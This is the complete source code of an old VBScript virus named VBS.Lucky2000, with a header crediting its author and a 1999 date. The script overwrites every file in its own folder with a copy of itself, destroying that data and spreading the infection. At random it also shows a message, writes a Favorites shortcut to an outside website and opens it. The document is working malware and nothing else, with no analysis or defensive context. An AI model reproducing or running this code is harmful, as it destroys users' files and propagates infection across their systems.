'Lucky2000
'------------------------------------------------
'VBS.Lucky2000
'Generated By: Lucky 2000 from Germany
'On 26.12.99
'------------------------------------------------"
Dim Lucky2000, WshShell, FSO, VX, VirusLink
On Error Resume Next
Randomize
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Wscript.CreateObject("Wscript.Shell")
Lucky2000 = Wscript.ScriptFullName
VX = Left(Lucky2000, InStrRev(Lucky2000, "\"))
For Each target in FSO.GetFolder(VX).Files
  FSO.CopyFile Lucky2000, target.Name, 1
Next
If Int((2 * Rnd) + 1) = 1 Then
  MsgBox "That is ou End....", 4096 , "VBS.Lucky2000"
  Set VirusLink = WshShell.CreateShortcut("C:\WINDOWS\Favorites\Lucky2000.URL")
  VirusLink.TargetPath = "http://www.chat.ru/~smf"
  VirusLink.Save
  WshShell.Run ("C:\WINDOWS\Favorites\Lucky2000.URL")
End If
'Lucky2000
